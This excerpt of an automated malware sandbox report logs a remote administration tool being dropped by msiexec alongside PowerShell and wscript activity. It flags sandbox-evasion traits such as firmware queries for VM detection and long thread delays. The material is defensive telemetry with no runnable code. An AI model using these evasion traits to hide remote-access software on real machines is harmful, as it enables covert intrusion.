          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess information set: NOGPFAULTERRORBOX

          Malware Analysis System Evasion

          barindex
          Query firmware table information (likely to detect VMs)
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeSystem information queried: FirmwareTableInformation
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeSystem information queried: FirmwareTableInformation
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeSystem information queried: FirmwareTableInformation
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeSystem information queried: FirmwareTableInformation
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeSystem information queried: FirmwareTableInformation
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeSystem information queried: FirmwareTableInformation
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeSystem information queried: FirmwareTableInformation
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeSystem information queried: FirmwareTableInformation
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeSystem information queried: FirmwareTableInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6168Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3575Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7602Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1913Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6599
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7701
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\VPDAgent.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrv_rppd.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\msvcr120.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\emf2pdf.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\webmmux.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrvui_rppd.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\ARPPRODUCTICON.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rppdpm.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unires_vpd.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\server_config_C8E9A92497A149D695F92E4E3AE550F0.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\msvcr120.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rppdui.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\setupdrv.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\vccorlib120.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrv_rppd.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI44FB.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisencoder.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\vpd_sdk.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\vccorlib120.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\progressbar.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\setupdrv.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rppdpm.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\fwproc.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\MessageBox.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\msvcp120.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\libcodec32.dllJump to dropped file
